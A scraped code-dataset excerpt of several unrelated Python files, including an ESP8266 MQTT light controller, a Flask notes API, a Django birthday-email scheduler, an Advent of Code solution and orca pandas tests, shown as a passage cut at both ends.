SWITCH_PIN.value(0)\r\n client = MQTTClient(CLIENT_ID, BROKER_ADDRESS)\r\n client.set_callback(received)\r\n client.connect()\r\n time.sleep(2)\r\n print(\"connecting\")\r\n client.subscribe(ROOT_TOPIC + b'#')\r\n print('Connected to %s MQTT broker, subscribed to %s topic' % (BROKER_ADDRESS, ROOT_TOPIC))\r\n SWITCH_PIN.value(1)\r\n client.publish(ROOT_TOPIC + b'version', 'Version 2021.091')\r\n return client\r\n except:\r\n SWITCH_PIN.value(1)\r\n time.sleep(1)\r\n SWITCH_PIN.value(0)\r\n time.sleep(1)\r\n SWITCH_PIN.value(1)\r\n time.sleep(1)\r\n SWITCH_PIN.value(0)\r\n time.sleep(1)\r\n SWITCH_PIN.value(1)\r\n time.sleep(1)\r\n SWITCH_PIN.value(0)\r\n return None\r\n\r\n################# main for light ########################\r\nprint(\"Loading.............\")\r\nclient = 
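# connect_and_subscribe above blinks the LED and returns None on failure,
# which the main loop then has to paper over. A common alternative is bounded
# exponential backoff; sketched here for umqtt.simple with assumed delays
# (a real client would also call set_callback before subscribing):
import time
from umqtt.simple import MQTTClient

def connect_with_backoff(client_id, broker, topic, retries=5):
    delay = 1
    for _ in range(retries):
        try:
            client = MQTTClient(client_id, broker)
            client.connect()
            client.subscribe(topic)
            return client
        except OSError:
            time.sleep(delay)
            delay = min(delay * 2, 30)  # cap the wait at 30 s
    return None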
connect_and_subscribe()\r\nsleep(2)\r\nlast_message = 0\r\nmessage_interval = 30\r\ntime_interval = 3600\r\n#wdt.feed()\r\nlastin = 1\r\ncounting = False\r\nsw1count = 0\r\nsavtime = ''\r\n#wdt.feed()\r\n#print(dir(client.ping))\r\nshort_time = 5\r\ndown_time = 50\r\n\r\nctrlw_down = 0\r\nctrlw_raise = False\r\nctrlw_short = 0\r\nctrlw_level = 0\r\n\r\nctrlm_down = 0\r\nctrlm_raise = False\r\nctrlm_short = 0\r\nctrlm_level = 0\r\nwhile 1:\r\n try:\r\n try:\r\n client.check_msg()\r\n except:\r\n print(\"error checking\")\r\n client = connect_and_subscribe()\r\n#######################start white contro\r\n if CTRL_WHITE.value() == 0:\r\n #print(\".\", end='')\r\n if ctrlw_short > 0:\r\n print(\"XX\", end='')\r\n ctrlw_short += 1\r\n if ctrlw_short > short_time:\r\n ctrlw_short = 0\r\n print(str(status['white']['state']) == 'OFF')\r\n #######Toggle state##########\r\n if str(status['white']['state']) == 'OFF':\r\n WHITE_PIN.duty(status['white']['brightness'])\r\n status['white']['state'] = 'ON'\r\n else:\r\n WHITE_PIN.duty(0)\r\n status['white']['state'] = 'OFF' \r\n client.publish(ROOT_TOPIC + b'white/state', str(ujson.dumps(status['white'])))\r\n savestate()\r\n if CTRL_WHITE.value() == 1:\r\n print(\"after short2\" + str(ctrlw_short))\r\n print(\"||||||\", end='')\r\n ctrlw_down = 0\r\n ctrlw_level = int(status['white']['brightness'])\r\n if ctrlw_short > 1:\r\n ctrlw_raise = True\r\n else:\r\n ctrlw_dimming = True\r\n print(ctrlw_level)\r\n while CTRL_WHITE.value() == 1:\r\n ctrlw_down += 1\r\n if ctrlw_down > down_time:\r\n WHITE_PIN.duty(ctrlw_level)\r\n if ctrlw_level < 1:\r\n ctrlw_raise = True\r\n if ctrlw_raise == True:\r\n ctrlw_level = int(ctrlw_level) + 1\r\n if int(ctrlw_level) > 1024:\r\n print(\"Stop Bright\")\r\n #ctrlw_dimming = True\r\n ctrlw_raise = False\r\n ctrlw_short = 0\r\n else:\r\n ctrlw_raise = True\r\n else:\r\n ctrlw_level -= 1\r\n if ctrlw_level < 1:\r\n ctrlw_raise = True\r\n sleep(.01)\r\n if ctrlw_down > down_time:\r\n ctrlw_short = 0\r\n ctrlw_down = 0\r\n else:\r\n ctrlw_short = 1\r\n ctrlw_raise = False\r\n ctrlw_dimming = False\r\n status['white']['brightness'] = ctrlw_level\r\n if ctrlw_down == 0: \r\n client.publish(ROOT_TOPIC + b'white/state', str(ujson.dumps(status['white'])))\r\n savestate()\r\n ctrlw_raise = False\r\n ctrlw_dimming = False\r\n print(\"after short1\" + str(ctrlw_short))\r\n#######################logic#################################\r\n if CTRL_MOOD.value() == 0:\r\n #print(\".\", end='')\r\n if ctrlm_short > 0:\r\n print(\"XX\", end='')\r\n ctrlm_short += 1\r\n if ctrlm_short > short_time:\r\n ctrlm_short = 0\r\n print(str(status['rgb']['state']) == 'OFF')\r\n #######Toggle state##########\r\n if str(status['rgb']['state']) == 'OFF':\r\n #WHITE_PIN.duty(status['rgb']['brightness'])\r\n status['rgb']['state'] = 'ON'\r\n BRIGHTMULTIPLIER = float(status['rgb']['brightness'] / 1024)\r\n red = int(float(status['rgb']['color']['r'] /255) *1024)\r\n red = int(red * BRIGHTMULTIPLIER )\r\n green = int(float(status['rgb']['color']['g'] /255) * 1024)\r\n green = int(green * BRIGHTMULTIPLIER)\r\n blue = int(float(status['rgb']['color']['b'] /255) * 1025)\r\n blue = int(blue * BRIGHTMULTIPLIER)\r\n print(\"red is:\" + str(red))\r\n print(\"green is:\" + str(green))\r\n print(\"blue is:\" + str(blue))\r\n RED_PIN.duty(int(red))\r\n GREEN_PIN.duty(int(green))\r\n BLUE_PIN.duty(int(blue))\r\n else:\r\n RED_PIN.duty(0)\r\n GREEN_PIN.duty(0)\r\n BLUE_PIN.duty(0)\r\n status['rgb']['state'] = 'OFF'\r\n client.publish(ROOT_TOPIC + b'rgb/state', 
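# The brightness/colour maths above is pasted three times, and the blue
# channel scales by 1025 where red and green use 1024 -- likely a copy/paste
# slip. One helper removes both the repetition and the inconsistency; whether
# full scale on this board is 1023 or 1024 is left as an assumption to verify.
def rgb_to_duty(color, brightness, full_scale=1024):
    k = (brightness / full_scale) * (full_scale / 255)  # mirrors the two-step scaling above
    return tuple(int(color[ch] * k) for ch in ('r', 'g', 'b'))

# e.g. rgb_to_duty({'r': 255, 'g': 128, 'b': 0}, 512) -> (512, 257, 0)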
str(ujson.dumps(status['rgb'])))\r\n savestate()\r\n if CTRL_MOOD.value() == 1:\r\n print(\"||||||\", end='')\r\n ctrlm_down = 0\r\n ctrlm_level = int(status['rgb']['brightness'])\r\n if ctrlm_short < 1:\r\n ctrlm_raise = True\r\n else:\r\n ctrlm_raise = False\r\n while CTRL_MOOD.value() == 1:\r\n ctrlm_down += 1\r\n if ctrlm_down > down_time:\r\n status['rgb']['brightness'] = ctrlm_level\r\n BRIGHTMULTIPLIER = float(status['rgb']['brightness'] / 1024)\r\n red = int(float(status['rgb']['color']['r'] /255) *1024)\r\n red = int(red * BRIGHTMULTIPLIER )\r\n green = int(float(status['rgb']['color']['g'] /255) * 1024)\r\n green = int(green * BRIGHTMULTIPLIER)\r\n blue = int(float(status['rgb']['color']['b'] /255) * 1025)\r\n blue = int(blue * BRIGHTMULTIPLIER)\r\n print(\"red is:\" + str(red))\r\n print(\"green is:\" + str(green))\r\n print(\"blue is:\" + str(blue))\r\n RED_PIN.duty(int(red))\r\n GREEN_PIN.duty(int(green))\r\n BLUE_PIN.duty(int(blue))\r\n if ctrlm_level < 1:\r\n ctrlm_raise = True\r\n if ctrlm_raise == True:\r\n ctrlm_level += 1\r\n if int(ctrlm_level) > 1024:\r\n ctrlm_raise = False\r\n else:\r\n ctrlm_raise = True\r\n else:\r\n ctrlm_level -= 1\r\n if ctrlm_level < 1:\r\n ctrlm_raise = True\r\n print(str(ctrlm_level) + \"--\" + str(int(red)))\r\n sleep(.01)\r\n if ctrlm_down > down_time:\r\n ctrlm_short = 0\r\n ctrlm_down = 0\r\n else:\r\n ctrlm_short = 1\r\n ctrlm_raise = False\r\n status['rgb']['brightness'] = ctrlm_level\r\n if ctrlm_down == 0: \r\n client.publish(ROOT_TOPIC + b'rgb/state', str(ujson.dumps(status['rgb'])))\r\n savestate()\r\n ctrlm_raise = False\r\n ctrlm_dimming = False\r\n############################################mood######################################\r\n if (time.time() - last_message) > float(message_interval):\r\n try:\r\n client.publish(ROOT_TOPIC + b'white/state', str(ujson.dumps(status['white'])))\r\n client.publish(ROOT_TOPIC + b'rgb/state', str(ujson.dumps(status['rgb'])))\r\n last_message = time.time()\r\n except:\r\n print(\"error sending\")\r\n client = connect_and_subscribe() \r\n elif time.time() < last_message:\r\n last_message = time.time()\r\n sleep(.1)\r\n except KeyboardInterrupt:\r\n print('Interrupted')\r\n os._exit(0)\r\n except:\r\n machine.reset()\r\n################# main for light ########################\r\n","repo_name":"Doug-Wyman/ESP8266_MQTT_light","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"42996621824","text":"class Figu:\r\n def Cono(self):\r\n r = float(input(\"digite la el radio: \"))\r\n a = float(input(\"digite la altura: \"))\r\n Volumen1 = ((r ** 2 * a) / 3) * 3.141592\r\n print(\"El volumen del cono es:\", \"{0:.2f}\".format(Volumen1))\r\n\r\n def Cilindro(self):\r\n r = float(input(\"Ingrese el radio: \"))\r\n a = float(input(\"Ingrese la altura: \"))\r\n Volumen2 = 3.141592 * r ** 2 * a\r\n print(\"El volumen del cilindro es:\", \"{0:.2f}\".format(Volumen2))\r\n\r\n def Esfera(self):\r\n r = float(input(\"Ingrese el radio: \"))\r\n Volumen3 = (4 / 3) * 3.141592 * r ** 3\r\n print(\"El volumen de la esfera es: \", \"{0:.2f}\".format(Volumen3))\r\n\r\n\r\nclass CEsfera(Figu):\r\n def formula(self):\r\n self.Esfera()\r\n\r\n\r\nclass CCilindro(Figu):\r\n def formula(self):\r\n self.Cilindro()\r\n\r\n\r\nclass CCono(Figu):\r\n def formula(self):\r\n self.Cono()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n print(\"Opciones\\n1. Esfera 2. Cilindro 3. 
Cono\")\r\n Opcion = int(input('Que opcion desea utilizar: '))\r\n\r\n try:\r\n if Opcion == 1:\r\n CEsfera().formula()\r\n elif Opcion == 2:\r\n CCilindro().formula()\r\n elif Opcion == 3:\r\n CCono().formula()\r\n except:print(\"opcion no valida.\")","repo_name":"jorgemartino/Programacion-III","sub_path":"Quiz#2.py","file_name":"Quiz#2.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"71576144422","text":"from flask import abort\r\nfrom config import db\r\nfrom note_model import Note, NoteSchema\r\nfrom person_model import Person, PersonSchema\r\n# GET /notes\r\n# POST /people/{person_id}/notes\r\n# GET /people/{person_id}/notes/{note_id}\r\n# PUT /people/{person_id}/notes/{note_id}\r\n# DELETE /people/{person_id}/notes/{note_id}\r\n\r\ndef read_all():\r\n notes = Note.query.outerjoin(Person).all()\r\n\r\n note_schema = NoteSchema(many=True)\r\n results = note_schema.dump(notes)\r\n\r\n return results\r\n\r\n\r\ndef create(person_id, note):\r\n person = {\r\n Person.query.filter(Person.person_id == person_id)\r\n .outerjoin(Note)\r\n .one_or_more()\r\n }\r\n \r\n if person is None:\r\n abort (404, f\"Person with id {person_id} is not found\")\r\n\r\n content = note.get(\"content\")\r\n new_note = Note(content = content, person_id = Person.id)\r\n\r\n person.notes.append(new_note)\r\n\r\n db.session.commit()\r\n\r\n note_schema = NoteSchema()\r\n\r\n result = note_schema(new_note)\r\n\r\n return result\r\n\r\ndef read_one(person_id, note_id):\r\n note = (Note.query.filter(Note.note_id == note_id)\r\n .filter(Person.person_id == person_id)\r\n .one_or_none()\r\n )\r\n \r\n print(note)\r\n\r\n if note is None:\r\n abort(404, 'Note with id {note_id} own by person {person_id} is not found')\r\n\r\n note_schema = NoteSchema()\r\n result = note_schema.dump(note)\r\n\r\n return result\r\n\r\ndef update(person_id, note_id, note):\r\n found_note = {\r\n Note.query.join(Person, Person.person_id == Note.person_id)\r\n .filter(Note.note_id == note_id)\r\n .one_or_none()\r\n }\r\n\r\n if found_note is None:\r\n abort(404, 'Note with id {note_id} own by person {person_id} is not found')\r\n\r\n found_note.content = note.get(\"content\")\r\n\r\n db.merge(found_note)\r\n db.session.commit()\r\n\r\n note_schema = NoteSchema()\r\n result = note_schema.dump(found_note)\r\n\r\n return result","repo_name":"jovanhidayat/trainingPhython","sub_path":"sesi5b/note_controller.py","file_name":"note_controller.py","file_ext":"py","file_size_in_byte":1949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"31922924704","text":"import json\r\nimport os\r\nimport statistics\r\nimport asyncio\r\nimport deepdiff\r\n\r\nfrom subalert.base import Utils, SubQuery\r\n\r\nfrom .config import Configuration\r\nfrom .subq import Queue\r\n\r\nqueue = Queue()\r\n\r\n\r\nclass TipsSubscription:\r\n def __init__(self):\r\n self.config = Configuration()\r\n self.utils = Utils()\r\n self.subquery = SubQuery()\r\n self.substrate = self.config.substrate\r\n self.ticker = self.config.yaml_file['chain']['ticker']\r\n self.hashtag = str(self.config.yaml_file['twitter']['hashtag'])\r\n self.loop = asyncio.get_event_loop()\r\n\r\n def has_tips_updated(self):\r\n \"\"\"\r\n :return: check if tips data has updated since you last checked.\r\n \"\"\"\r\n tip_construct = []\r\n\r\n if not os.path.isfile('data-cache/tips.cache'):\r\n self.utils.cache_data('data-cache/tips.cache', 
self.subquery.tips_info())\r\n\r\n cached_tips_data = self.utils.open_cache('data-cache/tips.cache')\r\n\r\n difference = deepdiff.DeepDiff(cached_tips_data, self.subquery.tips_info(), ignore_order=True).to_json()\r\n result = json.loads(difference)\r\n\r\n if len(result) == 0:\r\n print(\"🔧 No changes to commission have been found since the last execution\")\r\n exit(1)\r\n\r\n tips_construct = {\"tips\": []}\r\n\r\n for key, value in result.items():\r\n # type_change ['closes'] goes from null to an integer value (block height) of when the tip will be closed.\r\n if key == 'dictionary_item_added':\r\n for tip_hash in value:\r\n tip_hash = tip_hash.replace(\"root['\", \"\").replace(\"']\", \"\").replace(\"['finders_fee\", \"\")\r\n reason = self.subquery.tip_reason(self.subquery.tip_info(tip_hash)['reason'])\r\n\r\n tweet_body = (\r\n f\"🖐️A new tip has been proposed.\\n\\n\"\r\n f\"{reason}\\n\\n\"\r\n f\"https://www.dotreasury.com/{self.ticker}/tips/{tip_hash}\"\r\n )\r\n tips_construct['tips'].append(tweet_body)\r\n queue.enqueue(tips_construct)\r\n elif key == 'type_changes':\r\n for tip_hash, attributes in result[key].items():\r\n if 'closes' in tip_hash:\r\n tip_hash = tip_hash.replace(\"root['\", \"\").replace(\"']\", \"\").replace(\"['closes\", \"\")\r\n reason = self.subquery.tip_reason(cached_tips_data[tip_hash]['reason'])\r\n close_height = attributes['new_value']\r\n tip_values = []\r\n\r\n # tips_data[tip_hash]['tips'] = tuple: (tipper, amount)\r\n for tipper, amount in self.subquery.tips_info()[tip_hash]['tips']:\r\n tip_values.append(amount)\r\n\r\n median = statistics.median(tip_values) / 10 ** self.substrate.token_decimals\r\n\r\n if median <= 0.0:\r\n pass\r\n else:\r\n tweet_body = (\r\n f\"💰Tip closed for {median} {self.ticker}\\n\\n\"\r\n f\"{reason}\\n\\n\"\r\n f\"payout scheduled on block {close_height:,}\\n\\n\"\r\n f\"https://www.dotreasury.com/{self.ticker}/tips/{tip_hash}\"\r\n )\r\n\r\n tips_construct['tips'].append(tweet_body)\r\n queue.enqueue(tips_construct)\r\n else:\r\n continue\r\n\r\n if queue.size() >= 1:\r\n task = self.loop.create_task(queue.process_queue())\r\n self.loop.run_until_complete(task)\r\n\r\n self.utils.cache_data('data-cache/tips.cache', self.subquery.tips_info())\r\n","repo_name":"Nadro-J/py-subalert","sub_path":"subalert/tips.py","file_name":"tips.py","file_ext":"py","file_size_in_byte":3834,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"27911860443","text":"menu = {\n \"Appetizers\": [\"Wings\", \"Cookies\", \"Spring Rolls\"],\n \"Entrees\": [\"Salmon\", \"Steak Meat\", \"Tornado\", \"A Literal Garden\"],\n \"Desserts\": [\"Ice Cream\", \"Cake\", \"Pie\"],\n \"Beverages\": [\"Coffee\", \"Tea\", \"Unicorn Tears\"],\n}\n\norder = {}\n\n\ndef welcome():\n print(\n \"\"\"\n**************************************\n** Welcome to the Snakes Cafe! **\n** Please see our menu below. **\n** **\n** To quit at any time, type \"quit\" **\n**************************************\n\"\"\"\n )\n\n\ndef displayMenu(menu):\n for category in menu:\n print(\"\")\n print(category)\n print(\"----------\" + \"\\n\")\n for item in menu[category]:\n print(item)\n print(\"\")\n\n print(\n \"\"\"\n***********************************\n** What would you like to order? 
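# The tip tracker above drives everything off deepdiff output; a tiny runnable
# look at the two diff keys it branches on (`dictionary_item_added` for new
# tip hashes, `type_changes` when `closes` flips from None to a block height):
import json
import deepdiff

old = {'0xaa': {'closes': None}}
new = {'0xaa': {'closes': 123}, '0xbb': {'closes': None}}
diff = json.loads(deepdiff.DeepDiff(old, new, ignore_order=True).to_json())
print(sorted(diff))  # ['dictionary_item_added', 'type_changes']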
**\n***********************************\n\"\"\"\n )\n\n\ndef user_insertion():\n user_input = input(\">\")\n words = user_input.split(\" \")\n for i in range(len(words)):\n words[i] = words[i].title()\n user_input = \" \".join(words)\n return user_input\n\n\ndef main():\n customer_order = user_insertion()\n while customer_order != \"Quit\":\n if any(customer_order in values for values in menu.values()):\n if customer_order in order:\n order[customer_order] += 1\n else:\n order[customer_order] = 1\n print(\n f\"** {order[customer_order]} order of {customer_order} has been added to your meal **\"\n )\n else:\n print(\"sorry we dont have this item !\")\n\n customer_order = user_insertion()\n\n end_application()\n\n\ndef end_application():\n print(\"thanks for using snakes cafe application !\")\n\n\n# invoke the function\n# if __name__==\"__main__\":\nwelcome()\ndisplayMenu(menu)\nmain()\n","repo_name":"Malik-Essa99/snakes-cafe","sub_path":"snakes_cafe.py","file_name":"snakes_cafe.py","file_ext":"py","file_size_in_byte":1831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"39167920648","text":"from rest_framework.views import APIView\nfrom rest_framework.response import Response\nimport requests\nimport json\nimport os\n\nclass YourView(APIView):\n def post(self, request):\n data = request.data # Access the JSON payload from the request body\n print(data)\n stocks = []\n for stock in data['stocks']:\n stocks.append(stock[0])\n stockData = self.getStockData(data['startDate'], stocks)\n #stockTotals = self.calculateStocks(data['initialBalance'], data['stocks'])\n \n return Response(stockData)\n \n def getStockData(self, startDate, stocks):\n params = {\n 'access_key': os.environ.get(\"access_key\"),\n 'symbols': stocks,\n 'date_from': startDate,\n }\n api_result = requests.get('http://api.marketstack.com/v1/eod', params)\n\n api_response = api_result.json()\n print(json.dumps(api_response, indent=4))\n for stock_data in api_response['data']:\n print(u'Ticker %s has a day high of %s on %s' % (\n stock_data['symbol'],\n stock_data['high'],\n stock_data['date']\n ))\n \n return api_response \n\n def calculateStocks(self, total, stocks):\n stockTotals = {}\n # percentage return = (returned amount - initial investment) / initial investment\n for stock in stocks:\n stockName = stock[0]\n stockPercentage = stock[1]\n stockTotals[stockName] = (total * (stockPercentage/100))\n\n return stockTotals\n\n ","repo_name":"ALee888/portfolio_calc_backend","sub_path":"api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"6472057412","text":"# coding=utf-8\nimport calendar\nimport datetime\nimport json\n\nfrom django import forms\nfrom django.contrib.auth import get_user_model\nfrom django.core.mail import EmailMessage\nfrom django_celery_beat.models import PeriodicTask, IntervalSchedule, CrontabSchedule\n\nfrom send_email import models\n\nUSER_MODEL = get_user_model()\n\n\nclass MyModelChoiceField(forms.ModelMultipleChoiceField):\n def label_from_instance(self, obj):\n return obj.username\n\n\nclass FormEmail(forms.Form):\n users = MyModelChoiceField(label=\"Пользователи\", queryset=USER_MODEL.objects.all(), )\n email_layout = forms.ModelChoiceField(label=\"Email шаблоны\", queryset=models.EmailLayout.objects.all(), )\n\n def send_email(self):\n users = self.cleaned_data[\"users\"]\n email_layout = 
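# calculateStocks above silently accepts percentage splits that do not sum to
# 100. A hedged variant that validates the allocation first; the 1e-9
# tolerance is an assumption for float input:
def allocate(total, stocks):
    if abs(sum(pct for _, pct in stocks) - 100) > 1e-9:
        raise ValueError("stock percentages must sum to 100")
    return {name: total * pct / 100 for name, pct in stocks}

print(allocate(1000, [("AAPL", 60), ("MSFT", 40)]))  # {'AAPL': 600.0, 'MSFT': 400.0}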
self.cleaned_data[\"email_layout\"].path_layout\n\n for user in users:\n birthday = user.subscriber.birthday\n birthday_context = calendar.timegm(birthday.timetuple())\n\n schedule, _ = CrontabSchedule.objects.get_or_create(\n minute=\"*\",\n hour=12,\n day_of_week=\"*\",\n day_of_month=birthday.day,\n month_of_year=birthday.month,\n )\n\n context = {\"first_name\": user.first_name,\n \"last_name\": user.last_name,\n \"birthday\": birthday_context}\n\n task, _ = PeriodicTask.objects.get_or_create(\n name=\"Birthday {username} {birthday}\".format(username=user.username,\n birthday=birthday),\n crontab=schedule,\n task=\"send_email.tasks.send_message\",\n kwargs=json.dumps({\n \"context\": context,\n \"email_layout\": email_layout,\n \"user_email\": user.email,\n \"username\": user.username\n }),\n )\n","repo_name":"NaborSlov/email_link_test_case","sub_path":"send_email/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"11029538799","text":"def parse():\n insertion_rules={}\n with open(\"input.txt\") as file:\n lines = file.readlines()\n\n template = lines[0].strip()\n\n for line in lines[2:]:\n key, value = line.strip().split(' -> ')\n insertion_rules[key] = value\n\n print(insertion_rules)\n\n return template, insertion_rules\n\ndef part_one(template, insertion_rules):\n step = 1\n while step <= 10:\n temp = ''\n #print(template)\n char_counts = {}\n for (idx, c) in enumerate(template):\n temp += c\n if c not in char_counts:\n char_counts[c] = 0\n char_counts[c] += 1\n\n if idx+1 < len(template):\n ins = insertion_rules[c+template[idx+1]]\n temp += ins\n\n if ins not in char_counts:\n char_counts[ins] = 0\n char_counts[ins] += 1\n\n template = temp\n #print(f\"After step {step}: {template}\")\n print(char_counts)\n print(step, max(char_counts.values()) - min(char_counts.values()), len(template))\n step += 1\n\n\ndef part_two(template, insertion_rules):\n base_pairs = {k: 0 for k,_ in insertion_rules.items()}\n pairs = dict(base_pairs)\n\n # create initial pairs\n for i in range(0, len(template)-1):\n pairs[template[i:i+2]] += 1\n\n step = 1\n while step <= 40:\n temp = dict(base_pairs)\n\n for pair in pairs:\n temp[pair[0]+insertion_rules[pair]] += pairs[pair]\n temp[insertion_rules[pair] + pair[1]] += pairs[pair]\n\n pairs = temp\n step += 1\n\n char_counts = {v: 0 for v in insertion_rules.values()}\n for pair in pairs:\n char_counts[pair[0]] += pairs[pair]\n char_counts[pair[1]] += pairs[pair]\n char_counts[template[0]] += 1\n char_counts[template[-1]] += 1\n\n print((max(char_counts.values())-min(char_counts.values()))/2)\n \n\ntemplate, insertion_rules = parse()\npart_one(template, insertion_rules)\nprint(\"---------------------\")\npart_two(template, insertion_rules)\n\n","repo_name":"tully2003/aoc-2021","sub_path":"day-14/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"9882148862","text":"from string import ascii_lowercase as alphabet\n\nif __name__ == '__main__':\n\n my_str = 'abc'\n my_list = []\n\n for lettre in alphabet[:10]:\n my_list.append(lettre)\n\n decalage = 0\n for chiffre in range(1, 10):\n position = chiffre + decalage\n decalage += 1\n my_list.insert(position, chiffre)\n\n print(my_list)\n\n position = len(my_list) - 1\n while position >= 0:\n print(my_list[position], end=' ')\n position -= 1\n\n 
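# part_two of the day-14 solution above implements the pair-counting trick;
# collections.Counter keeps the same idea shorter, and counting only each
# pair's first character (plus the template's final character once) avoids
# the divide-by-two step:
from collections import Counter

def polymerize(template, rules, steps):
    pairs = Counter(template[i:i + 2] for i in range(len(template) - 1))
    for _ in range(steps):
        nxt = Counter()
        for (a, b), n in ((tuple(p), n) for p, n in pairs.items()):
            m = rules[a + b]
            nxt[a + m] += n
            nxt[m + b] += n
        pairs = nxt
    chars = Counter({template[-1]: 1})
    for p, n in pairs.items():
        chars[p[0]] += n
    return max(chars.values()) - min(chars.values())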
print()\n index = 0\n for element in my_list:\n if str(element) not in alphabet:\n if element % 2 == 1:\n print(my_list[index - 1], end=\" \")\n index += 1\n\n # Exercice 3\n def somme_liste(liste):\n return sum(liste)\n\n print(somme_liste([1, 2, 3, 4]))\n\n # Exercice 4\n liste = [1, 2, 3, 4, 5]\n print(liste)\n if 4 in liste:\n print('4 est dans la liste')\n else:\n print('4 n\\'est pas dans la liste')\n\n liste[0] = 17\n # print(liste)\n\n liste[2] = liste[1] + liste[3]\n # print(liste)\n\n liste[0], liste[-1] = liste[-1], liste[0]\n # print(liste)\n\n for chiffre in liste:\n print(chiffre)\n","repo_name":"PierreAnken/TrainingPython","sub_path":"student_exercices/Tommaso/Test3.py","file_name":"Test3.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"14665964162","text":"import unittest\nimport orca\nfrom setup.settings import *\nfrom pandas.util.testing import *\n\n\nclass DataFrameReashapingTest(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n # connect to a DolphinDB server\n orca.connect(HOST, PORT, \"admin\", \"123456\")\n\n def test_dataframe_reshaping_sorting_transposing_droplevel(self):\n pdf = pd.DataFrame([[1, 2, 3, 4],\n [5, 6, 7, 8],\n [9, 10, 11, 12]\n ]).set_index([0, 1]).rename_axis(['a', 'b'])\n\n pdf.columns = pd.MultiIndex.from_tuples([\n ('c', 'e'), ('d', 'f')\n ], names=['level_1', 'level_2'])\n odf = orca.DataFrame(pdf)\n assert_frame_equal(pdf.droplevel('a'), odf.droplevel('a').to_pandas())\n # TODO:NotImplementedError: Orca does not support axis == 1\n # assert_frame_equal(pdf.droplevel('level_2',axis=1), odf.droplevel('level_2',axis=1).to_pandas())\n\n def test_dataframe_reshaping_sorting_transposing_pivot(self):\n pdf = pd.DataFrame({'foo': ['one', 'one', 'one', 'two', 'two', 'two'],\n 'bar': ['A', 'B', 'C', 'A', 'B', 'C'],\n 'baz': [1, 2, 3, 4, 5, 6],\n 'zoo': [2, 4, 5, 6, 4, 7]})\n odf = orca.DataFrame(pdf)\n ptable = pdf.pivot(index='foo', columns='bar', values='baz')\n otable = odf.pivot(index='foo', columns='bar', values='baz')\n assert_frame_equal(otable.to_pandas(), ptable)\n\n # TODO:orca不支持多个values\n ptable = pdf.pivot(index='foo', columns='bar', values=['baz', 'zoo'])\n # otable = odf.pivot(index='foo', columns='bar', values=['baz', 'zoo'])\n # assert_frame_equal(otable.to_pandas(), ptable)\n # TODO:orcab不支持下标\n ptable = pdf.pivot(index='foo', columns='bar')['baz']\n # otable = odf.pivot(index='foo', columns='bar')['baz']\n # assert_frame_equal(otable.to_pandas(), ptable)\n # TODO:orca不支持index,columns参数为多个列组成的list\n\n def test_dataframe_reshaping_sorting_transposing_pivot_table(self):\n pdf = pd.DataFrame({\"A\": [\"foo\", \"foo\", \"foo\", \"foo\", \"foo\", \"bar\", \"bar\", \"bar\", \"bar\"],\n \"B\": [\"one\", \"one\", \"one\", \"two\", \"two\", \"one\", \"one\", \"two\", \"two\"],\n \"C\": [\"small\", \"large\", \"large\", \"small\", \"small\", \"large\", \"small\", \"small\", \"large\"],\n \"D\": [1, 2, 2, 3, 3, 4, 5, 6, 7],\n \"E\": [2, 4, 5, 5, 6, 6, 8, 9, 9]})\n odf = orca.DataFrame(pdf)\n ptable = pdf.pivot_table(values='D', index='A', columns='C', aggfunc=\"sum\")\n otable = odf.pivot_table(values='D', index='A', columns='C', aggfunc=\"sum\")\n assert_frame_equal(otable.to_pandas(), ptable)\n\n pdf = pd.DataFrame({\"time\": pd.date_range(\"15:00:00\", periods=9, freq=\"30s\"),\n \"A\": [\"foo\", \"foo\", \"foo\", \"foo\", \"foo\", \"bar\", \"bar\", \"bar\", \"bar\"],\n \"B\": [\"one\", \"one\", \"one\", \"two\", \"two\", 
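# The insert-with-offset loop above interleaves digits into the letter list;
# the same list comes straight from zip, which avoids tracking a shifting
# insertion index:
from string import ascii_lowercase as alphabet

interleaved = [x for pair in zip(alphabet[:10], range(1, 10)) for x in pair]
interleaved.append(alphabet[9])  # zip stops at 9 digits, so 'j' is re-appended
print(interleaved)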
\"one\", \"one\", \"two\", \"two\"],\n \"C\": [\"small\", \"large\", \"large\", \"small\", \"small\", \"large\", \"small\", \"small\", \"large\"],\n \"D\": [1, 2, 2, 3, 3, 4, 5, 6, 7],\n \"E\": [2, 4, 5, 5, 6, 6, 8, 9, 9],\n \"F\": [2, 4, 5, 5, 6, 6, 8, 9, 9]})\n odf = orca.DataFrame(pdf)\n ptable = pdf.pivot_table(values='D', index=pdf.time.dt.minute, columns='A', aggfunc=\"sum\")\n otable = odf.pivot_table(values='D', index=odf.time.dt.minute, columns='A', aggfunc=\"sum\")\n assert_frame_equal(otable.to_pandas(), ptable)\n ptable = pdf.pivot_table(values='D', index='A', columns=pdf.time.dt.minute, aggfunc=\"sum\")\n otable = odf.pivot_table(values='D', index='A', columns=odf.time.dt.minute, aggfunc=\"sum\")\n # TODO:DIFFERENT COLNAME\n # assert_frame_equal(otable.to_pandas(), ptable)\n\n # TODO:orca不支持index,columns参数为多个列组成的list\n\n def test_dataframe_reshaping_sorting_transposing_reorder_levels(self):\n arrays = [np.array(['bar', 'bar', 'baz', 'baz', 'foo', 'foo', 'qux', 'qux']),\n np.array(['one', 'two', 'one', 'two', 'one', 'two', 'one', 'two'])]\n pdf 